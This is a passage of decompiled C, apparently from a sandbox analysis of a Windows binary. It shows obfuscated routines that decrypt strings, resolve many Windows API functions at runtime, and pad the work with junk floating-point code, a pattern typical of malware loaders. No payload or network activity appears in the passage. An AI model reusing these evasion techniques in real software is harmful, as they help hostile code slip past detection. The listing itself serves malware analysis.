				long long _t1612;
				signed int _t1616;
				signed int _t1617;
				signed int _t1630;
				signed long long _t1637;
				long long _t1641;
				long long _t1654;
				signed int _t1666;
				signed int _t1667;
				long long _t1670;
				signed int _t1671;
				signed int _t1673;
				signed int _t1677;
				signed int _t1680;
				signed int _t1682;
				long long _t1687;
				signed int _t1695;
				signed int _t1696;
				signed long long _t1698;
				long long _t1707;
				signed long long _t1708;
				long long _t1712;
				signed int _t1715;
				signed int _t1731;
				signed int _t1733;
				signed int _t1752;
				signed int _t1756;
				signed int _t1761;

				_t908 = _t907 | 0xffffffff;
				 *0x3ce45c =  *0x3ce45c + _t908;
				_t307 =  *0x3ce45c; // 0x3519d6c0
				_v32 = _t307 - 0x489a5b35;
				asm("fild dword [ebp-0x1c]");
				_v12 = _t1554;
				 *0x3ce548 =  *0x3ce548 * _v12;
				 *0x3ce438 =  *0x3ce438 +  *0x3c8330;
				_t911 =  *0x3ce0cc; // 0x35085801
				_t1076 =  *0x3ce280; // 0xa4969772
				_t912 =  *0x3ce234; // 0x82cc2880
				 *0x3ce234 = _t912 * (0xf8cb0737 - _t911 + _t1076);
				 *0x3ce0cc =  *0x3ce0cc + 1;
				asm("fld1");
				asm("fxch st0, st1");
				 *0x3ce160 =  *0x3ce160 - st0;
				_t1077 =  *0x3ce160; // 0x35000000
				_t312 =  *0x3ce164; // 0xc1bd5c4f
				_v12 = _t1077;
				_v8 = _t312;
				asm("fsubr qword [ebp-0x8]");
				 *0x3ce3e8 = E0039CABC();
				_t914 =  *0x3ce51c; // 0xaae
				 *0x3d0288 = 0;
				 *0x3d02e4 = 1;
				 *0x3ce4d4 =  *0x3ce4d4 + 0xb34e00ca - _t914;
				 *0x3cfc2c = 0;
				asm("fsubr qword [0x3ce2c8]");
				 *0x3cfc84 = 0;
				 *0x3cfb1c = 0;
				 *0x3d030c = 1;
				 *0x3d0744 = 0;
				 *0x3d04ec = 0;
				 *0x3d02d4 = 0;
				 *0x3ce2c8 =  *0x3ce044;
				_t316 =  *0x3ce1c0; // 0xa815
				_t1563 =  *0x3ce2c8 +  *0x3c8328;
				_v32 = _t316;
				_v12 = _t1563;
				asm("fild dword [ebp-0x1c]");
				asm("fsubr qword [ebp-0x8]");
				_v36 = _t1563;
				_v12 =  *0x3ce3b8 -  *0x3c8320;
				_t1567 =  *0x3ce110 + _v12;
				asm("fcomp qword [ebp-0x20]");
				asm("fnstsw ax");
				asm("fld1");
				if((_t316 & 0x00000001) != 0) {
					st0 = _t1567;
				} else {
					 *0x3ce584 =  *0x3ce584 - st1;
					_v36 =  *0x3ce448;
					_v12 =  *0x3ce02c;
					_t1567 =  *0x3ce584;
					asm("fsubr qword [ebp-0x8]");
					asm("fsubr qword [ebp-0x20]");
					 *0x3ce448 = _t1567;
					asm("fsubr dword [0x3ce02c]");
					 *0x3ce02c = _t1567;
				}
				_t1079 =  *0x3ce024; // 0x80000001
				_v32 = _t1079;
				asm("fild dword [ebp-0x1c]");
				 *0x3d0478 = 0;
				 *0x3d04c8 = 0;
				 *0x3d04cc = 0;
				 *0x3d0320 = 0;
				 *0x3d0298 = 0;
				 *0x3ce25c = _t1567;
				 *0x3ce024 =  *0x3ce024 + 1;
				_t1294 =  *0x3c3568; // 0xea15a919
				_t317 = E0039CBC4(_t1079, 0, _t1294, 0x3ff0); // executed
				_t1365 = _t1364 + 4;
				 *0x3d04c0 = _t317;
				_t1515 = _t317;
				if(_t317 == 0) {
					_t905 =  *0x3ce180; // 0x7246
					_v32 = _t905;
					asm("fild dword [ebp-0x1c]");
					_v12 = _t1567;
					asm("fsubp st1, st0");
					asm("fsubr qword [ebp-0x8]");
					 *0x3ce180 = E0039CABC();
					_t1567 =  *0x3ce078;
					asm("fld1");
					asm("faddp st1, st0");
					 *0x3ce078 = _t1567;
					_t317 = E0039DF62(0);
				}
				E0039C990(_t317, 0, 0x3ff0);
				_t1080 =  *0x3d04c0; // 0x2d828e8
				E00391B00(_t1567, _t1080, 0xffc, _t1294);
				_t320 =  *0x3d04c0; // 0x2d828e8
				_t322 =  *(_t320 + 0x10) ^  *0x3c3570;
				_v32 = _t322;
				 *0x3cfc9c = _t322;
				 *0x3d050c = E0038CF90(_t1515, _t1567, 0xc6a, 0x20);
				 *0x3d0494 = E0038CF90(_t1515, _t1567, 0xede, 0x16);
				 *0x3d026c = E0038CF90(_t1515, _t1567, 0x23e3, 0x16);
				 *0x3ce580 =  *0x3ce580 + _t908;
				_v8 =  *0x3ce580 & 0x0000ffff;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1567;
				 *0x3ce3e0 =  *0x3ce3e0 + _v12;
				 *0x3d031c = E0038CF90(_t1515,  *0x3ce3e0 + _v12, 0x14fc, 0x16);
				 *0x3d04b8 = E0038CF90(_t1515,  *0x3ce3e0 + _v12, 0x3058, 0x34);
				_t328 = E0038CF90(_t1515,  *0x3ce3e0 + _v12, 0x15c0, 0x34);
				 *0x3d04f8 = _t328;
				 *0x3d04ac = _t328;
				 *0x3d04b0 = E0038CF90(_t1515,  *0x3ce3e0 + _v12, 0x24b6, 0x20);
				_t330 = E0038CF90(_t1515,  *0x3ce3e0 + _v12, 0xc9, 0x21);
				_v12 =  *0x3ce60c;
				 *0x3cfc74 = _t330;
				_t1572 =  *0x3ce2f0 * _v12;
				 *0x3ce60c = _t1572;
				_t331 = E0038CF90(_t1515, _t1572, 0x308e, 0x11);
				_t909 = GetProcAddress;
				_t332 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0430 = GetProcAddress(_t332, _t331);
				_t334 = E0038CF90(_t1515, _t1572, 0x1603, 0xc);
				E00396570(0x11, _t331);
				_t917 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0468 = GetProcAddress(_t917, _t334);
				_t337 = E0038CF90(_t1515, _t1572, 0x1a22, 0xd);
				E00396570(0xc, _t334);
				_t1082 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc38 = GetProcAddress(_t1082, _t337);
				 *0x3ce080 = 0xf362bf6c;
				_t340 = E0038CF90(_t1515, _t1572, 0x37e2, 0xe);
				E00396570(0xd, _t337);
				_t342 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d04c4 = GetProcAddress(_t342, _t340);
				_t344 = E0038CF90(_t1515, _t1572, 0x12da, 0xc);
				E00396570(0xe, _t340);
				_t918 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d049c = GetProcAddress(_t918, _t344);
				_t347 = E0038CF90(_t1515, _t1572, 0x30a1, 0x11);
				_t1083 =  *0x3ce4d0; // 0x6c745516
				_v8 = _t1083;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1572;
				_t1574 =  *0x3ce134 + _v12;
				 *0x3ce0e4 = E0039CABC();
				E00396570(0xc, _t344);
				_t350 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d075c = GetProcAddress(_t350, _t347);
				_t352 = E0038CF90(_t1515, _t1574, 0x2af2, 0x13);
				E00396570(0x11, _t347);
				_t919 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0500 = GetProcAddress(_t919, _t352);
				_t355 = E0038CF90(_t1515, _t1574, 0xfa9, 0x12);
				_t1084 =  *0x3ce44c; // 0x2575
				_v8 = 0x375b5cf - _t1084;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1574;
				_t1576 =  *0x3ce448 + _v12;
				 *0x3ce448 = _t1576;
				E00396570(0x13, _t352);
				_t1085 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfb14 = GetProcAddress(_t1085, _t355);
				_t359 = E0038CF90(_t1515, _t1576, 0xe5f, 0x10);
				E00396570(0x12, _t355);
				 *0x3ce01c =  *0x3ce01c + 1;
				_t361 =  *0x3ce01c; // 0x9b827a58
				_t1086 =  *0x3cfc6c; // 0x74ca0000
				_v8 = 0x5873e6f1 - _t361;
				asm("fild dword [ebp-0x4]");
				 *0x3ce120 = _t1576;
				 *0x3cfc68 = GetProcAddress(_t1086, _t359);
				_t363 = E0038CF90(_t1515, _t1576, 0x1e33, 0xf);
				E00396570(0x10, _t359);
				_t365 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0740 = GetProcAddress(_t365, _t363);
				_t367 = E0038CF90(_t1515, _t1576, 0x139, 0xa);
				E00396570(0xf, _t363);
				_t924 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfb18 = GetProcAddress(_t924, _t367);
				_t1210 = E0038CF90(_t1515, _t1576, 0x3720, 9);
				E00396570(0xa, _t367);
				_t1087 =  *0x3ce4e8; // 0x6bb26d6e
				_t1378 = _t1365 + 0x110;
				_t1516 = ( *0x3ce59c & 0x0000ffff) - 0x5ce7c64c - _t1087;
				if(( *0x3ce59c & 0x0000ffff) <= 0x5ce7c64c - _t1087) {
					 *0x3ce018 = 0xffffe659;
				}
				_t926 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0308 = GetProcAddress(_t926, _t1210);
				_t375 = E0038CF90(_t1516, _t1576, 0xf98, 0xf);
				E00396570(9, _t1210);
				_t1089 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0738 = GetProcAddress(_t1089, _t375);
				_t378 = E0038CF90(_t1516, _t1576, 0xdef, 0xe);
				E00396570(0xf, _t375);
				_t380 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d04fc = GetProcAddress(_t380, _t378);
				_t382 = E0038CF90(_t1516, _t1576, 0x241c, 0x19);
				E00396570(0xe, _t378);
				_t927 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfb00 = GetProcAddress(_t927, _t382);
				_t385 = E0038CF90(_t1516, _t1576, 0x2ac6, 0xd);
				E00396570(0x19, _t382);
				_t1090 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc28 = GetProcAddress(_t1090, _t385);
				_t388 = E0038CF90(_t1516, _t1576, 0x3e2e, 0x13);
				E00396570(0xd, _t385);
				asm("fsubr qword [0x3c8310]");
				 *0x3ce1e4 =  *0x3ce5c8;
				_t390 =  *0x3cfc6c; // 0x74ca0000
				 *0x3ce5c8 =  *0x3ce5c8 +  *0x3c75c8;
				 *0x3d04a0 = GetProcAddress(_t390, _t388);
				_t392 = E0038CF90(_t1516,  *0x3ce5c8 +  *0x3c75c8, 0x3014, 0xd);
				E00396570(0x13, _t388);
				_t928 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0464 = GetProcAddress(_t928, _t392);
				_t395 = E0038CF90(_t1516,  *0x3ce5c8 +  *0x3c75c8, 0x37a6, 0xf);
				E00396570(0xd, _t392);
				_t1091 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0450 = GetProcAddress(_t1091, _t395);
				_t1582 =  *0x3ce418 -  *0x3c8308 -  *0x3c8300;
				 *0x3ce2d0 = _t1582;
				_t398 = E0038CF90(_t1516, _t1582, 0x2169, 0x15);
				E00396570(0xf, _t395);
				_t400 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0268 = GetProcAddress(_t400, _t398);
				_t402 = E0038CF90(_t1516, _t1582, 0x2a9f, 0xc);
				E00396570(0x15, _t398);
				_t929 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0764 = GetProcAddress(_t929, _t402);
				_t405 = E0038CF90(_t1516, _t1582, 0x3838, 0xa);
				E00396570(0xc, _t402);
				_t1092 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0278 = GetProcAddress(_t1092, _t405);
				_t408 = E0038CF90(_t1516, _t1582, 0x21ae, 0xa);
				_t409 =  *0x3ce570; // 0xa494
				_v8 = _t409 + 0x18ab98f7;
				asm("fild dword [ebp-0x4]");
				 *0x3ce418 = _t1582;
				 *0x3ce570 =  *0x3ce570 - 1;
				E00396570(0xa, _t405);
				_t1093 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d04e8 = GetProcAddress(_t1093, _t408);
				_t412 = E0038CF90(_t1516, _t1582, 0x218a, 0xe);
				E00396570(0xa, _t408);
				_t414 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc5c = GetProcAddress(_t414, _t412);
				_t416 = E0038CF90(_t1516, _t1582, 0x3664, 0xf);
				E00396570(0xe, _t412);
				_t1094 =  *0x3ce194; // 0xdd6f5169
				_t933 =  *0x3ce310; // 0x604307b9
				_t1095 =  *0x3cfc6c; // 0x74ca0000
				 *0x3ce310 = _t933 * (( *0x3ce008 & 0x0000ffff) - _t1094);
				 *0x3d043c = GetProcAddress(_t1095, _t416);
				_t421 = E0038CF90(_t1516, _t1582, 0x302c, 0xa);
				E00396570(0xf, _t416);
				_t423 =  *0x3cfc6c; // 0x74ca0000
				_t424 = GetProcAddress(_t423, _t421);
				_t935 =  *0x3ce34c; // 0xc60d09f3
				 *0x3d02a8 = _t424;
				 *0x3ce34c = _t935 * 0xd92507c6;
				_t1308 = E0038CF90(_t1516, _t1582, 0x39c9, 0xd);
				_v8 = ( *0x3ce598 & 0x0000ffff) + ( *0x3ce2d8 & 0x0000ffff) + 0x51384b83;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1582;
				_t1584 =  *0x3ce324 * _v12;
				 *0x3ce324 = _t1584;
				 *0x3ce2d8 =  *0x3ce2d8 + 1;
				E00396570(0xa, _t421);
				_t938 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0444 = GetProcAddress(_t938, _t1308);
				_t430 = E0038CF90(_t1516, _t1584, 0x22a5, 0xd);
				E00396570(0xd, _t1308);
				_v8 =  *0x3ce04c & 0x0000ffff;
				_t1309 = _t1308 | 0xffffffff;
				asm("fild dword [ebp-0x4]");
				 *0x3ce0b0 = _t1584;
				 *0x3ce04c =  *0x3ce04c + _t1309;
				_t939 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc8c = GetProcAddress(_t939, _t430);
				 *0x3ce0e8 =  *0x3ce0e8 + _t1309;
				_t1099 =  *0x3ce0e8; // 0xe89a10bc
				_v8 = _t1099;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				_t434 = E0038CF90(_t1516,  *0x3ce148, 0x3818, 0x11);
				E00396570(0xd, _t430);
				_t436 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc58 = GetProcAddress(_t436, _t434);
				_t438 = E0038CF90(_t1516,  *0x3ce148, 0x32ce, 0x11);
				E00396570(0x11, _t434);
				_t940 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0290 = GetProcAddress(_t940, _t438);
				_t441 = E0038CF90(_t1516,  *0x3ce148, 0x11b, 0x13);
				E00396570(0x11, _t438);
				_t1100 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d02ac = GetProcAddress(_t1100, _t441);
				_t444 = E0038CF90(_t1516,  *0x3ce148, 0x2ab6, 0xe);
				 *0x3ce200 =  *0x3ce200 +  *0x3c75c8;
				_v12 =  *0x3ce200 +  *0x3c82f8;
				 *0x3ce0e4 = E0039CABC();
				E00396570(0x13, _t441);
				_t447 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0514 = GetProcAddress(_t447, _t444);
				_t449 = E0038CF90(_t1516,  *0x3ce120 + _v12, 0x1df6, 0xd);
				E00396570(0xe, _t444);
				_t941 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc44 = GetProcAddress(_t941, _t449);
				_t452 = E0038CF90(_t1516,  *0x3ce120 + _v12, 0x3fad, 0xa);
				E00396570(0xd, _t449);
				_t1101 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc54 = GetProcAddress(_t1101, _t452);
				_t1594 =  *0x3ce2a0 -  *0x3c82f4 -  *0x3c82f0;
				 *0x3ce2c4 = E0039CABC();
				_t456 = E0038CF90(_t1516, _t1594, 0x31b0, 0xc);
				E00396570(0xa, _t452);
				_t458 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d02b4 = GetProcAddress(_t458, _t456);
				_t460 = E0038CF90(_t1516, _t1594, 0x39d8, 0x11);
				E00396570(0xc, _t456);
				_t942 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc40 = GetProcAddress(_t942, _t460);
				_t463 = E0038CF90(_t1516, _t1594, 0x162f, 0x10);
				_t1314 = _t463;
				E00396570(0x11, _t460);
				_t1102 =  *0x3cfc6c; // 0x74ca0000
				_t1403 = _t1378 + 0x190;
				 *0x3d02f4 = GetProcAddress(_t1102, _t463);
				_t466 =  *0x3ce3ec; // 0x80000000
				_v8 = _t466;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1594;
				_t1597 =  *0x3ce480 + _v12 -  *0x3c82e8;
				_t943 =  *0x3ce288; // 0x6ce1ec48
				_v28 = _t1597;
				_v8 = _t943;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1597;
				_t1599 =  *0x3ce480 + _v12;
				asm("fcomp qword [ebp-0x18]");
				asm("fnstsw ax");
				_t1517 = _t466 & 0x00000001;
				if((_t466 & 0x00000001) == 0) {
					 *0x3ce34c = 0xd2989f46;
				}
				_t467 = E0038CF90(_t1517, _t1599, 0x131b, 0xb);
				E00396570(0x10, _t1314);
				_t1103 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d042c = GetProcAddress(_t1103, _t467);
				_t470 = E0038CF90(_t1517, _t1599, 0xec, 0xd);
				 *0x3ce608 = ( *0x3ce608 & 0x0000ffff) - 0x38b78fc3;
				E00396570(0xb, _t467);
				_t944 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc48 = GetProcAddress(_t944, _t470);
				_t475 = E0038CF90(_t1517, _t1599, 0x18a, 0xb);
				E00396570(0xd, _t470);
				_t1104 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d044c = GetProcAddress(_t1104, _t475);
				_t478 = E0038CF90(_t1517, _t1599, 0x3ae, 0xc);
				E00396570(0xb, _t475);
				_t480 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d02a4 = GetProcAddress(_t480, _t478);
				_t482 = E0038CF90(_t1517, _t1599, 0x2347, 0x13);
				E00396570(0xc, _t478);
				_t945 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc4c = GetProcAddress(_t945, _t482);
				_t485 = E0038CF90(_t1517, _t1599, 0x2ae2, 0xe);
				E00396570(0x13, _t482);
				_t1105 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0484 = GetProcAddress(_t1105, _t485);
				_t488 = E0038CF90(_t1517, _t1599, 0x231b, 7);
				E00396570(0xe, _t485);
				_t490 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d028c = GetProcAddress(_t490, _t488);
				_t492 = E0038CF90(_t1517, _t1599, 0x33b, 9);
				E00396570(7, _t488);
				_t946 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d02a0 = GetProcAddress(_t946, _t492);
				_t1227 = E0038CF90(_t1517, _t1599, 0x1d5f, 0x10);
				_v8 = _t1227;
				E00396570(9, _t492);
				_t1106 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc78 = GetProcAddress(_t1106, _t1227);
				_t1228 = E0038CF90(_t1517, _t1599, 0x3655, 0xd);
				_t500 = E00396570(0x10, _v8);
				_t1413 = _t1403 + 0xa0;
				asm("fcompp");
				asm("fnstsw ax");
				_t1604 =  *0x3ce0a0;
				asm("fld1");
				asm("faddp st1, st0");
				_t1518 = _t500 & 0x00000001;
				if((_t500 & 0x00000001) == 0) {
					_v28 =  *0x3ce5e8 +  *0x3c82d0;
					_t1604 =  *0x3ce4c8 + _v28;
					 *0x3ce4c8 =  *0x3ce4c8 + _v28;
				}
				_t947 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0760 = GetProcAddress(_t947, _t1228);
				_t502 = E0038CF90(_t1518, _t1604, 0xd08, 0x18);
				E00396570(0xd, _t1228);
				_t1107 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0314 = GetProcAddress(_t1107, _t502);
				_v28 =  *0x3ce548 +  *0x3c82c8 +  *0x3c82c0;
				 *0x3ce270 =  *0x3ce270 + _v28;
				 *0x3ce548 =  *0x3ce548 +  *0x3c75c8;
				_t505 = E0038CF90(_t1518,  *0x3ce548 +  *0x3c75c8, 0xf8b, 0xb);
				E00396570(0x18, _t502);
				_t507 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc30 = GetProcAddress(_t507, _t505);
				_t509 = E0038CF90(_t1518,  *0x3ce548 +  *0x3c75c8, 0x12f1, 0x11);
				E00396570(0xb, _t505);
				_t948 =  *0x3cfc6c; // 0x74ca0000
				_t511 = GetProcAddress(_t948, _t509);
				_t1612 =  *0x3ce044;
				_t1108 =  *0x3ce588; // 0xb5d5
				_v20 = _t1612;
				 *0x3d0270 = _t511;
				_v8 = _t1108;
				asm("fild dword [ebp-0x4]");
				_v28 = _t1612;
				_t1614 =  *0x3ce538 + _v28;
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce044 = _t1614;
				_t513 = E0038CF90(_t1518, _t1614, 0x37b7, 0x11);
				E00396570(0x11, _t509);
				_t949 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0488 = GetProcAddress(_t949, _t513);
				_t516 = E0038CF90(_t1518, _t1614, 0x3e1a, 0x12);
				E00396570(0x11, _t513);
				_t1109 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0274 = GetProcAddress(_t1109, _t516);
				_t519 = E0038CF90(_t1518, _t1614, 0x1304, 0x15);
				E00396570(0x12, _t516);
				_t521 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d04d8 = GetProcAddress(_t521, _t519);
				_t523 = E0038CF90(_t1518, _t1614, 0xe27, 0xb);
				E00396570(0x15, _t519);
				_t1110 =  *0x3cfc6c; // 0x74ca0000
				 *0x3ce028 = ( *0x3ce028 & 0x0000ffff) - 0x124f00c4;
				 *0x3cfc98 = GetProcAddress(_t1110, _t523);
				_t526 = E0038CF90(_t1518, _t1614, 0x2ca2, 0x12);
				E00396570(0xb, _t523);
				_t528 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc80 = GetProcAddress(_t528, _t526);
				_t530 = E0038CF90(_t1518, _t1614, 0xf37, 0x1d);
				E00396570(0x12, _t526);
				_t952 =  *0x3cfc6c; // 0x74ca0000
				 *0x3cfc50 = GetProcAddress(_t952, _t530);
				_t533 = E0038CF90(_t1518, _t1614, 0x37a, 0x15);
				E00396570(0x1d, _t530);
				_t1111 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0754 = GetProcAddress(_t1111, _t533);
				_t536 = E0038CF90(_t1518, _t1614, 0xfb, 0xb);
				E00396570(0x15, _t533);
				_t538 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d04d4 = GetProcAddress(_t538, _t536);
				_t540 = E0038CF90(_t1518, _t1614, 0x21d, 0x11);
				E00396570(0xb, _t536);
				_t953 =  *0x3cfc6c; // 0x74ca0000
				 *0x3d0498 = GetProcAddress(_t953, _t540);
				_t543 = E0038CF90(_t1518, _t1614, 0x3df6, 0xb);
				E00396570(0x11, _t540);
				_t545 = LoadLibraryA(_t543); // executed
				 *0x3d048c = _t545;
				E00396570(0xb, _t543);
				_t1427 = _t1413 + 0xd8;
				_t1519 =  *0x3d048c;
				if( *0x3d048c == 0) {
					_t898 = E0038CF90(_t1519, _t1614, 0x39eb, 0xc);
					_t1202 =  *0x3ce5d0; // 0x2c4b
					_v8 = _t1202;
					asm("fild dword [ebp-0x4]");
					_v8 = _t1614;
					 *0x3ce5d0 = E0039CABC();
					_t901 = LoadLibraryA(_t898);
					_t1614 =  *0x3ce448;
					_t1074 =  *0x3ce38c; // 0x93fc1fee
					_v20 =  *0x3ce448;
					_v8 = _t1074;
					asm("fild dword [ebp-0x4]");
					 *0x3d048c = _t901;
					asm("fsubr qword [ebp-0x10]");
					 *0x3ce284 = E0039CABC();
					 *0x3ce38c =  *0x3ce38c - 1;
					_t1520 =  *0x3ce38c;
					E00396570(0xc, _t898);
					_t1427 = _t1427 + 0x10;
				}
				_t547 = E0038CF90(_t1520, _t1614, 0xef6, 0xb);
				_t1112 =  *0x3d048c; // 0x74160000
				 *0x3d074c = GetProcAddress(_t1112, _t547);
				_t549 = E0038CF90(_t1520, _t1614, 0x382b, 0xb);
				 *0x3ce478 =  *0x3ce478 + 0x5b34efd0;
				E00396570(0xb, _t547);
				_t551 =  *0x3d048c; // 0x74160000
				 *0x3d02e8 = GetProcAddress(_t551, _t549);
				_t553 = E0038CF90(_t1520, _t1614, 0xf5b, 0xd);
				E00396570(0xb, _t549);
				_t954 =  *0x3d048c; // 0x74160000
				 *0x3d0748 = GetProcAddress(_t954, _t553);
				_t556 = E0038CF90(_t1520, _t1614, 0x2998, 7);
				E00396570(0xd, _t553);
				_t1113 =  *0x3d048c; // 0x74160000
				 *0x3cfc70 = GetProcAddress(_t1113, _t556);
				_t559 = E0038CF90(_t1520, _t1614, 0x39c2, 5);
				E00396570(7, _t556);
				_t561 =  *0x3d048c; // 0x74160000
				 *0x3d0480 = GetProcAddress(_t561, _t559);
				_t1237 = E0038CF90(_t1520, _t1614, 0xe34, 0xc);
				_v8 = _t1237;
				E00396570(5, _t559);
				_t955 =  *0x3d048c; // 0x74160000
				_t565 = GetProcAddress(_t955, _t1237);
				_t1616 =  *0x3ce058 -  *0x3c82b8;
				 *0x3d04f0 = _t565;
				 *0x3ce058 = _t1616;
				_t1238 = E0038CF90(_t1520, _t1616, 0x391, 8);
				E00396570(0xc, _v8);
				_t568 =  *0x3ce12c; // 0xd1b0ed04
				_t569 = _t568 - 0x7a999724;
				_v8 = _t569;
				asm("fild dword [ebp-0x4]");
				_t1434 = _t1427 + 0x68;
				_v20 = _t1616;
				_t1617 =  *0x3ce3e0;
				_t956 =  *0x3ce318; // 0x83ae
				_v8 = _t956;
				 *0x3ce318 =  *0x3ce318 + 1;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				_t1521 = 0x00000001 & _t569;
				if((0x00000001 & _t569) != 0) {
					 *0x3ce24c =  *0x3ce24c + 1;
					_t1116 =  *0x3ce24c; // 0x2b07f8d9
					_v8 = _t1116 + 0x6eeb6c2b;
					_v20 =  *0x3ce540 +  *0x3c82b0;
					asm("fild dword [ebp-0x4]");
					asm("fcomp qword [ebp-0x10]");
					asm("fnstsw ax");
					_t1617 =  *0x3ce540;
					asm("fld1");
					asm("faddp st1, st0");
					 *0x3ce540 = _t1617;
					__eflags = _t569 & 0x00000005;
					if(__eflags == 0) {
						 *0x3ce0b8 =  *0x3ce0b8 + 1;
						_t894 =  *0x3ce0b8; // 0xf45e
						_t1073 =  *0x3ce320; // 0xa75a
						_t1201 = _t1073 - _t894 + 0x35052b0a;
						__eflags = _t1201;
						_v8 = _t1201;
						asm("fild dword [ebp-0x4]");
						 *0x3ce3f0 = _t1617;
					}
				} else {
					 *0x3ce284 = ( *0x3ce284 & 0x0000ffff) - 0x9c88f13;
				}
				_t570 =  *0x3d048c; // 0x74160000
				 *0x3d0440 = GetProcAddress(_t570, _t1238);
				 *0x3ce34c =  *0x3ce34c - 1;
				_t958 =  *0x3ce34c; // 0xc60d09f3
				_v8 = 0xdae5289e - _t958;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1617;
				_v20 =  *0x3ce488 + _v20;
				 *0x3ce464 =  *0x3ce464 * _v20;
				asm("fld1");
				asm("faddp st1, st0");
				_t572 = E0038CF90(_t1521,  *0x3ce488, 0xf7b, 0xe);
				E00396570(8, _t1238);
				_t574 =  *0x3d048c; // 0x74160000
				 *0x3cfb08 = GetProcAddress(_t574, _t572);
				_t576 = E0038CF90(_t1521,  *0x3ce488, 0x1597, 6);
				_t959 =  *0x3ce378; // 0x1dce930
				 *0x3ce378 = _t959 * 0xd693be;
				E00396570(0xe, _t572);
				_v20 =  *0x3ce064;
				asm("fsubr qword [0x3c82a8]");
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce064 =  *0x3ce358;
				_t1120 =  *0x3d048c; // 0x74160000
				 *0x3ce358 =  *0x3ce358 +  *0x3c75c8;
				 *0x3d046c = GetProcAddress(_t1120, _t576);
				_t579 = E0038CF90(_t1521,  *0x3ce358 +  *0x3c75c8, 0x1d71, 0xa);
				 *0x3ce598 = ( *0x3ce598 & 0x0000ffff) + 0x6ed171b8;
				E00396570(6, _t576);
				_t961 =  *0x3d048c; // 0x74160000
				 *0x3cfb0c = GetProcAddress(_t961, _t579);
				_t584 = E0038CF90(_t1521,  *0x3ce358 +  *0x3c75c8, 0x1e27, 0xa);
				E00396570(0xa, _t579);
				_t1121 =  *0x3d048c; // 0x74160000
				_t586 = GetProcAddress(_t1121, _t584);
				_t1630 =  *0x3ce3f0 -  *0x3c82a0;
				 *0x3d029c = _t586;
				 *0x3ce3f0 = _t1630;
				_t587 = E0038CF90(_t1521, _t1630, 0x12e8, 7);
				E00396570(0xa, _t584);
				_t589 =  *0x3d048c; // 0x74160000
				 *0x3d0300 = GetProcAddress(_t589, _t587);
				_t591 = E0038CF90(_t1521, _t1630, 0xe9b, 5);
				_t962 =  *0x3ce284; // 0x12b2
				_v8 = _t962;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1630;
				_t592 =  *0x3ce208; // 0x58849b0
				asm("fsubr qword [ebp-0x10]");
				_v8 = _t592;
				_v20 =  *0x3ce228 -  *0x3c8298;
				asm("fild dword [ebp-0x4]");
				 *0x3ce208 = E0039CABC();
				 *0x3ce228 =  *0x3ce228 -  *0x3c75c8;
				 *0x3ce284 =  *0x3ce284 - 1;
				E00396570(7, _t587);
				_t963 =  *0x3d048c; // 0x74160000
				 *0x3d0460 = GetProcAddress(_t963, _t591);
				_t596 = E0038CF90(_t1521,  *0x3ce228 -  *0x3c75c8, 0x2aad, 7);
				E00396570(5, _t591);
				_t1123 =  *0x3d048c; // 0x74160000
				 *0x3d02fc = GetProcAddress(_t1123, _t596);
